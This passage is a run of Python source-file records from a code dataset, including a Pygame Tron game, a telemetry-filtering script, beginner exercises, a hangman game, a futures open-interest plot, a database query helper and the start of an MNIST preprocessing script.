explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player1 = True\n game_over = True\n break\n for i in range(1, len(car2) - 1): # colisão entre player 2 em si mesmo\n if car2[0][0] == car2[i][0] and car2[0][1] == car2[i][1] and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car2[0][0] - 5, car2[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player2 = True\n game_over = True\n break\n if num_players == 2:\n for i in range(1, len(car) - 1): #colisão entre cabeça do player 2 com a player 1\n if collision(car2[0], car[i]) and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car2[0][0] - 5, car2[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player2 = True\n game_over = True\n break\n if num_players == 2:\n for i in range(1, len(car2) - 1): #colisão entre cabeça do player 1 com o player 2\n if collision(car[0], car2[i]) and start:\n explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n game_over_player1 = True\n game_over = True\n break\n\n\n\n if game_over:\n break\n\n for c in range(len(car) - 1, 0, -1):\n car[c] = (car[c - 1][0], car[c - 1][1])\n\n for c in range(len(car2) - 1, 0, -1):\n car2[c] = (car2[c - 1][0], car2[c - 1][1])\n\n screen.fill((7, 8, 14)) # atualiza a tela pintando td de preto\n\n if escolha == 0:\n box = pygame.image.load(\"moeda_mario.png\")\n box_form = pygame.transform.scale(box, (10, 10))\n escolha2 = escolha\n if escolha == 1:\n box = pygame.image.load(\"sonic.png\")\n box_form = pygame.transform.scale(box, (13, 13))\n escolha2 = escolha\n if escolha == 2:\n box = pygame.image.load(\"cogumelo.png\")\n box_form = pygame.transform.scale(box, (13, 13))\n escolha2 = escolha\n\n\n if move == True:\n screen.blit(box_form, power_pos)\n\n '''pygame.draw.line(screen, (8, 232, 235), (599, 0), (599, 599))\n pygame.draw.line(screen, (8, 
232, 235), (599, 1), (1, 1))\n pygame.draw.line(screen, (8, 232, 235), (1, 599), (1, 1))\n pygame.draw.line(screen, (8, 232, 235), (1, 599), (599, 599))'''\n\n pygame.draw.line(screen, (8, 232, 235), (99, 19), (700, 19))\n pygame.draw.line(screen, (8, 232, 235), (99, 19), (99, 680))\n pygame.draw.line(screen, (8, 232, 235), (99, 680), (700, 680))\n pygame.draw.line(screen, (8, 232, 235), (700, 680), (700, 19))\n\n pygame.draw.rect(screen, ([255, 0, 0]), [702, 0, 100, 700])\n pygame.draw.rect(screen, ([255, 0, 0]), [400, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [400, 681, 400, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [0, 0, 98, 700])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 300, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 300, 20])\n global score1\n global score2\n if score2 - score1 == 1:\n pygame.draw.rect(screen, ([255, 0, 0]), [300, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [300, 0, 400, 18])\n if score2 - score1 == 2:\n pygame.draw.rect(screen, ([255, 0, 0]), [200, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [200, 0, 400, 18])\n if score2 - score1 == 3:\n pygame.draw.rect(screen, ([255, 0, 0]), [100, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [100, 0, 400, 18])\n if score2 - score1 == 4:\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 500, 99, 200])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 0, 99, 200])\n if score2 - score1 > 4:\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 0, 99, 700])\n\n\n if score1 - score2 == 1:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 400, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 400, 20])\n if score1 - score2 == 2:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 500, 18])\n 
pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 500, 20])\n if score1 - score2 == 3:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 602, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 602, 20])\n if score1 - score2 == 4:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 604, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 604, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 0, 100, 200])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 500, 100, 200])\n if score1 - score2 > 4:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 604, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 604, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 0, 99, 700])\n\n score_font = font_score.render('%s' % (score1), True, (255, 255, 255))\n score_rect = score_font.get_rect()\n score_rect.topleft = (30, 300)\n score_font2 = font_score.render('%s' % (score2), True, (255, 255, 255))\n score_rect2 = score_font.get_rect()\n score_rect2.topleft = (730, 300)\n if num_players == 1:\n score_font = font_score.render('%s' % (score), True, (255, 255, 255))\n score_top = font_scor.render('SCORE', True, (255, 255, 255))\n score_rec = score_top.get_rect()\n score_rec.topleft = (12, 270)\n screen.blit(score_top, score_rec)\n\n score_top2 = font_scoretop.render('TOP SCORE', True, (255, 255, 255))\n score_rec2 = score_top.get_rect()\n score_rec2.topleft = (708, 270)\n screen.blit(score_top2, score_rec2)\n score_font2 = font_score.render('%s' % (last_score), True, (255, 255, 255))\n if score > 9:\n score_rect.topleft = (10, 300)\n if score1 > 9:\n score_rect.topleft = (10, 300)\n if score2 > 9:\n score_rect2.topleft = (710, 300)\n if last_score > 9:\n score_rect2.topleft = (710, 300)\n\n screen.blit(score_font, score_rect)\n screen.blit(score_font2, score_rect2)\n\n\n #screen.blit(power, power_pos - 10)\n '''for x in range(0, 600, 10): # Draw vertical lines\n pygame.draw.line(screen, (8, 232, 235), (x, 0), (x, 600))\n for y in range(0, 600, 10): # Draw vertical 
lines\n pygame.draw.line(screen, (8, 232, 235), (0, y), (600, y))'''\n if not start and not move:\n screen.blit(font_start.render('APERTE ENTER PARA COMEÇAR', True, (255, 255, 255)), (150, 300))\n\n if time:\n pygame.draw.rect(screen, ([7, 8, 14]), [150, 300, 510, 50])\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n sleep(0.5)\n screen.blit(fonte_coord.render('3', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n\n screen.blit(fonte_coord.render('2', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n\n screen.blit(fonte_coord.render('1', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n direction_player1 = DOWN\n direction_player2 = K_s\n time = False\n move = True\n\n\n\n for pos in car:\n screen.blit(car_skin, pos)\n if car[0] and direction_player1 == UP:\n screen.blit(rotate_up, (pos))\n if car[0] and 
direction_player1 == DOWN:\n screen.blit(rotate_D, (pos))\n if car[0] and direction_player1 == LEFT:\n screen.blit(rotate_L, (pos))\n if car[0] and direction_player1 == RIGHT:\n screen.blit(rotate_R, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n if car2[0] and direction_player2 == K_w:\n screen.blit(rotate_up, (pos))\n if car2[0] and direction_player2 == K_s:\n screen.blit(rotate_D, (pos))\n if car2[0] and direction_player2 == K_a:\n screen.blit(rotate_L, (pos))\n if car2[0] and direction_player2 == K_d:\n screen.blit(rotate_R, (pos))\n\n pygame.display.update()\n while True:\n if empate:\n screen.blit(fonte_coord.render('EMPATE', True, (255, 255, 255)), (280, 300))\n pygame.display.update()\n sleep(2)\n start_the_game()\n elif game_over_player1:\n game_over_font = pygame.font.Font('freesansbold.ttf', 35)\n game_over_screen = game_over_font.render('JOGADOR AZUL VENCEU', True, (20, 20, 255))\n if num_players == 1:\n game_over_screen = game_over_font.render('YOU LOSE', True, (20, 20, 255))\n if score > last_score:\n last_score = score\n if num_players == 2:\n score1 = score1 + 1\n game_over_rect = game_over_screen.get_rect()\n game_over_rect.midtop = (400, 300)\n screen.blit(game_over_screen, game_over_rect)\n pygame.display.update()\n moeda_sound = mixer.Sound('win_sound.wav')\n moeda_sound.play()\n sleep(3)\n start_the_game()\n elif game_over_player2:\n game_over_font = pygame.font.Font('freesansbold.ttf', 35)\n game_over_screen = game_over_font.render('JOGADOR VERMELHO VENCEU', True, (255, 30, 30))\n score2 = score2 + 1\n game_over_rect = game_over_screen.get_rect()\n game_over_rect.midtop = (400, 300)\n screen.blit(game_over_screen, game_over_rect)\n pygame.display.update()\n moeda_sound = mixer.Sound('win_sound.wav')\n moeda_sound.play()\n sleep(3)\n start_the_game()\n\n screen.blit(fonte_coord.render((score), True, (255, 255, 255)), (10, 300))\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n 
pygame.quit()\n exit()\n\n\ndef menu1():\n pygame.init()\n surface = pygame.display.set_mode((700, 700))\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu = pygame_menu.Menu(400, 600, 'Tron',\n theme=pygame_menu.themes.THEME_DARK)\n\n menu.add_image('tronn.png', angle=0, scale=(0.4, 0.4))\n\n menu.set_sound(engine, recursive=True)\n\n menu.add_button('Começar', menu2)\n\n menu.mainloop(surface)\n\n\ndef menu2():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Tron',\n theme=pygame_menu.themes.THEME_DARK)\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n\n menu.add_button('Jogar', menu3)\n menu.add_button('Sobre', menu4)\n menu.add_button('Sair', pygame_menu.events.EXIT)\n\n menu.mainloop(surface)\n\n\ndef menu3():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Jogadores',\n theme=pygame_menu.themes.THEME_DARK)\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_button('1 Jogador', player1)\n menu.add_button(\"2 Jogadores\", player2)\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\ndef menu4():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Regras',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n regras= \"O jogo é formado por duas pessoas que controlam os Trons, \"\\\n \"usando as setinhas do teclado um jogador se move e o outro jogador \"\\\n \"para se mover irá utilizar o famoso WASD.\"\\\n \"Durante a partida alguns poderes irão aparecer, deixando cada vez mais \"\\\n \"o jogo dinâmico e competitivo. 
\"\\\n \"Vença o seu adversário não encostando e nem esbarrando em nada e tente \"\\\n \"pegar poderes para que você consiga ter certas vantagens. \"\\\n \"Boa Sorte!!\"\n\n font = pygame_menu.font.FONT_HELVETICA\n\n menu.add_label(regras, max_char=-1,font_size=20, font_name=font)\n\n menu.add_button(\"Poder\",menu5)\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\ndef player1():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Jogador 1',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_image('tron.png', angle=0, scale=(1, 1))\n menu.add_button(\"Vamos\", start_the_game1)\n menu.add_button('Voltar', menu3)\n\n menu.mainloop(surface)\n\ndef player2():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 800))\n menu = pygame_menu.Menu(500, 700, 'Jogador 2',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_image('tron.png', angle=0, scale=(0.7, 0.7))\n menu.add_image('tron.png', angle=0, scale=(0.7, 0.7))\n menu.add_button(\"Vamos\", start_the_game)\n menu.add_button('Voltar', menu3)\n\n menu.mainloop(surface)\n\ndef menu5():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 800))\n menu = pygame_menu.Menu(500, 700, 'Poder',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n text1 = \"Aumenta muito o tamanho.\"\n\n text2 = \"Aumenta a velocidade.\"\n\n text3 = \"Aumenta muito pouco o tamanho\"\n\n menu.add_image('cogumelo.png', angle=0, scale=(0.5, 0.5))\n\n font = pygame_menu.font.FONT_HELVETICA\n\n menu.add_label(text1, max_char=-1,font_size=20, font_name=font)\n\n 
menu.add_image('sonic.png', angle=0, scale=(0.5, 0.5))\n\n menu.add_label(text2, max_char=-1,font_size=20, font_name=font)\n\n menu.add_image('moeda_mario.png', angle=0, scale=(0.5,0.5))\n\n menu.add_label(text3, max_char=-1,font_size=20, font_name=font)\n\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\nmenu1()","sub_path":"isolate-SO-master/exe.win-amd64-3.8/Tron1.9.py","file_name":"Tron1.9.py","file_ext":"py","file_size_in_byte":28512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141367868","text":"#! /usr/bin/python\n\nimport argparse\nimport csv\nfrom collections import defaultdict\n\ndef get_args():\n\n #create and argumentparser object('parser') that will hold all info to parse the cmd line\n parser = argparse.ArgumentParser(description = 'This script removes false frequency-code pairs from telemetry data')\n\n #positional arguments\n #number argument to input\n parser.add_argument('tags_file', help='The list of real telemetry frequencies and codes')\n parser.add_argument('data_file', help='Tlemetry data')\n\n #parse the cmd line arguments\n return parser.parse_args()\n\ndef parse_tags():\n # codes dictionary: key = frequency, value = list of real codes\n codes = defaultdict(dict)\n\n # opening and reading tags file\n with open(args.tags_file, 'r') as tags: \n #create a csv reader object\n reader = csv.reader(tags, delimiter='\\t')\n\n #skip the header line\n header = next(reader)\n\n # read in file line by line\n for line in reader:\n\n #skip blank lines\n if not line:\n continue\n \n else:\n # need to ask if key exists already\n if line[0] in codes:\n # same as appending to a regular list\n codes[line[0]].append(line[1])\n else:\n codes[line[0]] = []\n codes[line[0]].append(line[1])\n\n #check our work\n for freq,code in codes.items():\n print(freq, code)\n \n return codes\n\ndef parse_data(code_dict):\n\n # open, read, and parse the telemetry data file\n with open(args.data_file, 
'r') as data:\n for line in data:\n\n # by default, .split works on white space no matter how many characters\n row = line.split()\n\n #skip the header, could make the value an optional input\n if row[0] == 'Date':\n print(line, end=' ')\n continue\n \n else:\n if row[5] in code_dict[row[4]]:\n print(line, end=' ')\n else:\n continue\n\ndef main():\n code_dict = parse_tags()\n parse_data(code_dict)\n\n#get the arguments before calling main\nargs = get_args()\n\n#execute the program by calling main. __ __allow you to call these functions in other scripts and not just through this one\nif __name__ == '__main__':\n main() \n\n\n","sub_path":"2019-04-17_clean_telemetry.py","file_name":"2019-04-17_clean_telemetry.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221807519","text":"dictionaryOne ={}\n\naSampleList = [1,2,3,4]\n\n\n#add values to dictionaryOne\n#Method 1\ndictionaryOne = {\n 'key1': 'value1',\n 'key2': 'value2',\n 'key3': 'value3',\n 'key7' :[ 'value2', 'value4']\n}\n\n#or method 2\n\ndictionaryTwo = {}\n\ndictionaryTwo['key4'] = 'value4'\ndictionaryTwo['key5'] = 'value5'\ndictionaryTwo['key6'] = 'value6'\n\n\nprint(aSampleList) \nprint(dictionaryOne)\nprint(dictionaryTwo)\n\n#to delete a value\ndictionaryOne.pop('key1')\n\n#for looping a dictionary\n# for each key value pair in items in dictionaries \nfor key,value in dictionaryTwo.items():\n print(\"I have\"+key+\" relating with \" +value)\n print(\"list in dictionarisies\" + key7[1])\n\nprint(dictionaryOne)","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559609771","text":"def leiaint(msg):\n \"\"\"\n Codigo pra validação de numero inteiro\n :param msg: Valor recebido\n :return: A int do Numero digitado.\n \"\"\"\n ok = False\n valor = 0\n while 
True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n ok = True\n else:\n print(f'\\033[0;31mERRO! Numero invalido.\\033[m')\n if ok:\n break\n return valor\n\n\nn = leiaint(\"Digite um numero: \")\nprint(f'Voce acabou de digitar o numero {n}')","sub_path":"exercicios/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409735091","text":"import webbrowser\n\n\nclass Movie():\n \"\"\"This class provides a way to store movie-related information.\n\n Attributes:\n title (str): title of the movie.\n storyline (str): brief synopsis of the movie.\n poster_image_url (str): URL of the image thumbnail to be displayed with\n each movie.\n trailer_youtube_url (str): URL of video to be played when movie\n thumbnail is clicked.\n \"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self,\n movie_title,\n movie_storyline,\n poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"Play the movie trailer in the browser.\"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"97936393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 20:35:55 2018\n\n@author: sanjotraibagkar\n\"\"\"\n\n\nfrom nsepy import get_history\nfrom datetime import date\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\nstock=\"SBIN\"\nstart=start=date(2017,12,26)\nend=date(2018,1,25)\nend2=date(2018,2,6)\ndata_fut = get_history(symbol=stock,start=start, end=end,futures=True,expiry_date=date(2018,1,25))\ndata_fut2 = get_history(symbol=stock,start=start, 
end=end2,futures=True, \n expiry_date=date(2018,2,22))\n\nOI_combined= pd.concat([data_fut2['Open Interest'],data_fut['Open Interest']],\n axis=1)\nOI_combined['OI_Combined']=OI_combined.sum(axis=1)\n\n\nplt.figure(1,figsize=(10,9))\nplt.subplot(211)\nplt.title('Open Interest')\nplt.plot(OI_combined.OI_Combined)\nplt.plot(OI_combined.OI_Combined.rolling(5).mean())\nplt.legend(['OI','OI_mean'])\n\nC_combined= pd.concat([data_fut2['Close'],data_fut['Close']],axis=1)\nC_combined['Continous_Close']=C_combined.iloc[:,1].fillna(C_combined.iloc[:,0])\n\nO_combined= pd.concat([data_fut2['Open'],data_fut['Open']],axis=1)\nO_combined['Continous_Open']=O_combined.iloc[:,1].fillna(O_combined.iloc[:,0])\n\nplt.subplot(212)\nplt.title('Close')\nplt.plot(C_combined.Continous_Close)\nplt.plot(O_combined.Continous_Open)\nplt.plot(C_combined.Continous_Close.rolling(5).mean())\nplt.legend(['Close','Open','Close_mean'])\n\nplt.show()","sub_path":"Phase2-OptionValuation/openintrestinoption.py","file_name":"openintrestinoption.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"317511529","text":"try:\n import numpy\n import cv2\n opencv = True\nexcept:\n opencv = False\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nfrom kivy.config import Config\nConfig.window_icon = \"data/icon.png\"\nfrom kivy.properties import StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.treeview import TreeViewNode\nfrom kivy.lang.builder import Builder\n\nBuilder.load_string(\"\"\"\n:\n color_selected: app.selected_color\n odd_color: app.list_background_odd\n even_color: app.list_background_even\n size_hint_y: None\n height: app.button_scale\n orientation: 'horizontal'\n LeftNormalLabel:\n text: root.title\n\n\"\"\")\n\n\n\nclass TreeViewInfo(BoxLayout, TreeViewNode):\n \"\"\"Simple treeview node to display a line of text.\n Has two elements, they will be shown as: 
'title: content'\"\"\"\n\n title = StringProperty()\n","sub_path":"screenAlbum/treeViewInfo.py","file_name":"treeViewInfo.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616910027","text":"# coding = latin-1 \n\nimport math\n\nnum = float(input(\"Digite um numero: \"))\n\nquadrado = num * num\ncubo = num * num * num \n\nraizquad = math.sqrt(num)\nraizcub = num ** (1/3)\n\nprint(f\"O quadrado de {num}: {quadrado}\\nO cubo de {num}: {cubo}\\nA raiz quadrade de {num}: {raizquad}\\nA raiz cubica de {num}: {raizcub}\")","sub_path":"calculo.py","file_name":"calculo.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141844281","text":"import random\nmy_list=[\"cat\",\"dog\",\"bird\",\"tiger\",\"bull\",\"rabit\",\"fish\",\"whale\"]\ndef hangman(word):\n wrong=0\n stages=[\"\",\n \"________ \",\n \"| \",\n \"| | \",\n \"| O \",\n \"| /|\\ \",\n \"| / \\ \",\n \"| \"\n ]\n rletters=list(word)\n board=[\"_\"]*len(word)\n win = False\n print(\"Welcome to Hangman!\")\n\n while wrong < len(stages)-1:\n print(\"\\n\")\n msg=\"guess a word\"\n char=input(msg)\n if char in rletters:\n cind=rletters.index(char)\n board[cind]=char\n rletters[cind]='$'\n else:\n wrong+=1\n print(\" \".join(board))\n e=wrong+1\n print(\"\\n\".join(stages[0:e]))\n if \"_\" not in board:\n print(\"you are winner!\")\n print(\" \".join(board))\n win=True\n break\n if not win:\n print(\"\\n\".join(stages[0:wrong+1]))\n print(\"you lose!the answer is {}.\".format(word))\n\nhangman(my_list[random.randint(0,7)])","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440116216","text":"# -*- coding: utf-8 -*-\n\nfrom utils.db import cfmedb, Db\n\n\ndef 
get_configuration_details(db=None, ip_address=None):\n \"\"\"Return details that are necessary to navigate through Configuration accordions.\n\n Args:\n ip_address: IP address of the server to match. If None, uses hostname from\n ``conf.env['base_url']``\n\n Returns:\n If the data weren't found in the DB, :py:class:`NoneType`\n If the data were found, it returns tuple `(region, server name, server id, server zone id)`\n \"\"\"\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n SEQ_FACT = 1e12\n miq_servers = db['miq_servers']\n for region in db.session.query(db['miq_regions']):\n reg_min = region.region * SEQ_FACT\n reg_max = reg_min + SEQ_FACT\n all_servers = db.session.query(miq_servers).all()\n server = None\n if len(all_servers) == 1:\n # If there's only one server, it's the one we want\n server = all_servers[0]\n else:\n # Otherwise, filter based on id and ip address\n def server_filter(server):\n return all([\n server.id >= reg_min,\n server.id < reg_max,\n # XXX: This currently fails due to public/private addresses on openstack\n server.ipaddress == ip_address\n ])\n servers = filter(server_filter, all_servers)\n if servers:\n server = servers[0]\n if server:\n return region.region, server.name, server.id, server.zone_id\n else:\n return None, None, None, None\n else:\n return None\n\n\ndef get_zone_description(zone_id, ip_address=None, db=None):\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n zones = list(\n db.session.query(db[\"zones\"]).filter(\n db[\"zones\"].id == zone_id\n )\n )\n if zones:\n return zones[0].description\n else:\n return None\n\n\ndef get_host_id(hostname, ip_address=None, db=None):\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n hosts = list(\n db.session.query(db[\"hosts\"]).filter(\n db[\"hosts\"].name == hostname\n )\n )\n if hosts:\n return 
str(hosts[0].id)\n else:\n return None\n","sub_path":"utils/db_queries.py","file_name":"db_queries.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316453356","text":"import tensorflow as tf\nfrom data_preparation import mnist_data\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom tensorflow.contrib.learn.python.learn.estimators.linear import LinearClassifier\nfrom sklearn.linear_model import Perceptron\nimport random\n\ndef load_data_set():\n\tdataset = mnist_data.load_mnist(reshape=True)\n\ttrain_set=dataset.train.images\n\ttrain_labels=dataset.train.labels\n\ttest_set=dataset.validation.images\n\ttest_labels=dataset.validation.labels\n\treturn train_set, train_labels, test_set, test_labels\n\ndef construct_feature_col(col_num=None):\n\tfeature_col = []\n\tfeature_dummy = []\n\tfeature_name_base = \"pixel_\"\n\tfor col_idx in range(col_num):\n\t\tfeature_col.append(tf.contrib.layers.real_valued_column(feature_name_base+str(col_idx)+\"th\"))\n\t\tfeature_dummy.append(feature_name_base+str(col_idx)+\"th\")\n\treturn feature_col, feature_dummy\n\ndef extract_for_binary(train_set=None, train_labels=None, test_set=None, test_labels=None):\n\tbinary_indices_train = []\n\tbinary_indices_test = []\n\tfor i in range(len(train_set)):\n\t\tif train_labels[i] == 6 or train_labels[i] == 8:\n\t\t\tbinary_indices_train.append(i)\n\tfor i in range(len(test_set)):\n\t\tif test_labels[i] == 6 or test_labels[i] == 8:\n\t\t\tbinary_indices_test.append(i)\n\ttrain_set_binary = np.take(train_set, binary_indices_train, axis=0)\n\ttrain_label_binary = np.take(train_labels, binary_indices_train)\n\ttest_set_binary = np.take(test_set, binary_indices_test, axis=0)\n\ttest_label_binary = np.take(test_labels, binary_indices_test)\n\treturn train_set_binary, train_label_binary, test_set_binary, test_label_binary\n\ndef input_fn(data_set=None, labels=None, 
feature_col=None):\n\t# Creates a dictionary mapping from each continuous feature column name (k) to\n\t# the values of that column stored in a constant Tensor.\n\tfeature_columns = {k_val: tf.constant(data_set[:, k_idx]) for k_idx, k_val in enumerate(feature_col)}\n\tlabel = tf.constant(labels)\n\treturn feature_columns, label\n\ndef down_sample(data_set=None, labels=None, down_sample_num=None):\n\tdown_sample_indices = np.random.randint(low=0, high=data_set.shape[0], size=down_sample_num)\n\tdown_samples = np.take(data_set, down_sample_indices, axis=0)\n\tdown_sample_labels = np.take(labels, down_sample_indices)\n\treturn down_samples, down_sample_labels\n\ndef random_crop(batch, crop_shape, padding=None):\n\tbatch=batch.reshape((batch.shape[0], int(np.sqrt(batch.shape[1])), int(np.sqrt(batch.shape[1]))))\n\toshape = np.shape(batch[0])\n\tif padding:\n\t oshape = (oshape[0] + 2*padding, oshape[1] + 2*padding)\n\tnew_batch = []\n\tnpad = ((padding, padding), (padding, padding))\n\tfor i in range(len(batch)):\n\t new_batch.append(batch[i])\n\t if padding:\n\t new_batch[i] = np.lib.pad(batch[i], pad_width=npad,\n\t mode='constant', constant_values=0)\n\t nh = random.randint(0, oshape[0] - crop_shape[0])\n\t nw = random.randint(0, oshape[1] - crop_shape[1])\n\t new_batch[i] = new_batch[i][nh:nh + crop_shape[0],\n\t nw:nw + crop_shape[1]]\n\treturn np.array(new_batch)\n\ndef flip_up_down(batch=None):\n\tbatch=batch.reshape((batch.shape[0], int(np.sqrt(batch.shape[1])), int(np.sqrt(batch.shape[1]))))\n\tfor i in range(len(batch)):\n\t\tbatch[i] = np.fliplr(batch[i])\n\treturn batch\n\nif __name__ == \"__main__\":\n\ttrain_set, train_labels, test_set, test_labels = load_data_set()\n\tnew_train_set = 